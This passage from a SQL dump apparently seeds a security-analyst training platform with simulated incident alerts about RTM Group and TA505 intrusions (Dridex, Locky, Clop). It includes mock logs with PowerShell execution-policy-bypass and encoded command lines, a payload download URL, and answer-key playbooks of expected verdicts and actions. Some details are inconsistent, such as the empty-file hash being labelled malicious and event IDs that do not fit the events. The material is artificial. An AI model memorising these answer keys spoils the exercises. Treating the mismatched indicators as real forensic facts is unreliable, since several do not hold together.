Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address linked to RTM Group activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1119, 'Unusual Script Execution on Workstations', 'high', 'Security Information and Event Management (SIEM) logs', 'An unauthorized script has been detected executing on a workstation, which is indicative of a trojan activation attempting to establish a covert communication channel with a command and control server operated by the RTM Group. This activity is associated with financial transaction monitoring.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"hostname\":\"workstation-15\",\"username\":\"jdoe\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"203.0.113.45\",\"script_name\":\"update_check.ps1\",\"script_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\update_check.ps1\",\"detected_by\":\"SIEM\",\"event_id\":\"4720\",\"additional_info\":\"The script update_check.ps1 is not recognized as a legitimate script and its hash is associated with known malware.\"}', '2026-02-01 13:57:41', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP associated with RTM Group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a PowerShell script used by RTM Group 
malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"update_check.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used by RTM Group for malicious scripts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account on the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.838Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"hostname\\\":\\\"workstation-15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"script_name\\\":\\\"update_check.ps1\\\",\\\"script_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update_check.ps1\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"event_id\\\":\\\"4720\\\",\\\"additional_info\\\":\\\"The script update_check.ps1 is not recognized as a legitimate script and its hash is associated with known malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.838Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"hostname\\\":\\\"workstation-15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"script_name\\\":\\\"update_check.ps1\\\",\\\"script_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update_check.ps1\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"event_id\\\":\\\"4720\\\",\\\"additional_info\\\":\\\"The script update_check.ps1 is not recognized as a legitimate script and its hash is associated with known malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.838Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"hostname\\\":\\\"workstation-15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"script_name\\\":\\\"update_check.ps1\\\",\\\"script_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update_check.ps1\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"event_id\\\":\\\"4720\\\",\\\"additional_info\\\":\\\"The script update_check.ps1 is not recognized as a legitimate script and its hash is associated with known malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.838Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"hostname\\\":\\\"workstation-15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"script_name\\\":\\\"update_check.ps1\\\",\\\"script_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update_check.ps1\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"event_id\\\":\\\"4720\\\",\\\"additional_info\\\":\\\"The script update_check.ps1 is not recognized as a legitimate script and its hash is associated with known malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.838Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"hostname\\\":\\\"workstation-15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"script_name\\\":\\\"update_check.ps1\\\",\\\"script_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update_check.ps1\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"event_id\\\":\\\"4720\\\",\\\"additional_info\\\":\\\"The script update_check.ps1 is not recognized as a legitimate script and its hash is associated with known malware.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1120, 'Persistent Network Anomalies', 'medium', 'Network Traffic Analysis', 'The RTM Group is suspected of maintaining persistent access within the network by utilizing legitimate software processes. Anomalous network traffic has been detected, indicating potential backdoor access via compromised software.', 'Persistence', 'T1505: Server Software Component', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:23Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.5\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"HTTPS\",\"user_agent\":\"legitimate-software-v3.1\",\"filename\":\"legit_software_updater.exe\",\"file_hash\":\"3a7bd3b456b9e6d8a1f3d4cb8f7c9b7de8b6a1f7\",\"username\":\"jdoe\",\"event_description\":\"Anomalous outbound connection detected potentially indicating a persistent backdoor. The process is utilizing legitimate update mechanisms to communicate with a known malicious IP.\"}', '2026-02-01 13:57:41', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with RTM Group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a7bd3b456b9e6d8a1f3d4cb8f7c9b7de8b6a1f7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash potentially linked to modified legitimate software used as a backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"legit_software_updater.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"clean\",\"details\":\"Commonly used legitimate software updater.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Active directory 
user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1121, 'Phishing Email Detected', 'high', 'Email Gateway Logs', 'A phishing email detected as part of TA505\'s signature campaign aimed at distributing the Dridex banking trojan. The email contained a malicious attachment intended to gain initial access to the network.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-08T14:22:35Z\",\"email_id\":\"e2f5b8d0-9c39-47a3-95b3-2f7a9e5f8e1b\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"sender_email\":\"malicious_actor@ta505campaign.com\",\"recipient_email\":\"john.doe@company.com\",\"subject\":\"Invoice Attached\",\"attachment\":{\"filename\":\"Invoice_2023.doc\",\"hash\":\"3f4d5c6a8b9e0f1234567890abcdef12\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"email_headers\":{\"from\":\"malicious_actor@ta505campaign.com\",\"to\":\"john.doe@company.com\",\"subject\":\"Invoice Attached\",\"message_id\":\"<1234567890@mail.ta505campaign.com>\"}}', '2026-02-01 13:58:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"malicious_actor@ta505campaign.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"malicious\",\"details\":\"Email involved in known TA505 phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Invoice_2023.doc\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f4d5c6a8b9e0f1234567890abcdef12\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known Dridex 
variant.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:22.841Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1122, 'Macro Execution in Document', 'high', 'Endpoint Detection and Response (EDR) Systems', 'Following successful delivery, the malicious document\'s macros are executed, initiating the download and installation of Dridex on the compromised system. The execution of the macro was detected on the endpoint, which downloaded the Dridex payload from a known malicious IP.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:18Z\",\"event_type\":\"macro_execution\",\"user\":\"jdoe\",\"host_ip\":\"192.168.1.15\",\"file_name\":\"invoice_2023.xlsm\",\"macro_id\":\"macro_001\",\"downloaded_payload\":{\"url\":\"http://malicious-domain.com/dridex.bin\",\"hash\":\"9f573a6b0b1a7d8c1f3e2b9d5a4c3e6f\",\"source_ip\":\"203.0.113.25\"},\"process\":{\"name\":\"excel.exe\",\"pid\":3456},\"external_ip\":\"203.0.113.25\",\"indicators\":[\"203.0.113.25\",\"9f573a6b0b1a7d8c1f3e2b9d5a4c3e6f\",\"invoice_2023.xlsm\"]}', '2026-02-01 13:58:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple Dridex campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9f573a6b0b1a7d8c1f3e2b9d5a4c3e6f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Dridex malware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice_2023.xlsm\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing campaigns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1123, 'Establishing Backdoor - TA505 Persistence', 'high', 'Network Traffic Analysis', 'TA505 is employing advanced techniques to maintain persistence within the network by establishing a backdoor. This facilitates the deployment of additional payloads such as Locky ransomware.', 'Persistence', 'T1105 - Ingress Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"443\",\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"file_hash\":\"9f2b4fc2b9e8b8f8c2d72e5bd4d9b826\",\"file_name\":\"backdoor_payload.exe\",\"command\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\backdoor_payload.exe\",\"action\":\"Connection Allowed\",\"additional_info\":{\"malware_family\":\"Locky\",\"c2_domain\":\"maliciousdomain.com\"}}', '2026-02-01 13:58:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP within internal network range\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known Command and Control (C2) server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9f2b4fc2b9e8b8f8c2d72e5bd4d9b826\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with Locky ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor_payload.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Uncommon filename observed in network traffic\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1124, 'Credential Dumping Detected', 'high', 'Security Information and Event Management (SIEM)', 'Credential dumping activity detected indicating potential lateral movement by threat actor TA505. The attacker aims to deploy Clop ransomware using harvested credentials.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-24T14:32:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"admin\",\"login_type\":\"Network\",\"process_name\":\"lsass.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"detected_by\":\"SIEM\",\"action_taken\":\"none\",\"description\":\"Unauthorized credential access detected on host 192.168.1.25 from IP 203.0.113.45 using process lsass.exe.\"}', '2026-02-01 13:58:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with TA505 campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping tools.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalRecords\",\"verdict\":\"suspicious\",\"details\":\"High-value target account used in unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"login_type\\\":\\\"Network\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"action_taken\\\":\\\"none\\\",\\\"description\\\":\\\"Unauthorized credential access detected on host 192.168.1.25 from IP 203.0.113.45 using process lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"login_type\\\":\\\"Network\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"action_taken\\\":\\\"none\\\",\\\"description\\\":\\\"Unauthorized credential access detected on host 192.168.1.25 from IP 203.0.113.45 using process lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"login_type\\\":\\\"Network\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"action_taken\\\":\\\"none\\\",\\\"description\\\":\\\"Unauthorized credential access detected on host 192.168.1.25 from IP 203.0.113.45 using process lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"login_type\\\":\\\"Network\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"action_taken\\\":\\\"none\\\",\\\"description\\\":\\\"Unauthorized credential access detected on host 192.168.1.25 from IP 203.0.113.45 using process lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"login_type\\\":\\\"Network\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"action_taken\\\":\\\"none\\\",\\\"description\\\":\\\"Unauthorized credential access detected on host 192.168.1.25 from IP 203.0.113.45 using process lsass.exe.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1125, 'Data Exfiltration via Clop Ransomware', 'critical', 'Data Loss Prevention (DLP) Systems', 'In the final phase of the attack, Clop ransomware has been activated on host 10.1.1.15. Sensitive data is being exfiltrated to an external IP 185.83.214.42 before files are encrypted, marking the completion of the attack chain and a subsequent ransom demand. Detected malicious file hash indicates known Clop variant.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T09:45:23Z\",\"event_id\":\"dlp-00432\",\"source_ip\":\"10.1.1.15\",\"destination_ip\":\"185.83.214.42\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"sensitive_data_backup.zip\",\"username\":\"jdoe\",\"event_description\":\"Data exfiltration detected. Suspected Clop ransomware 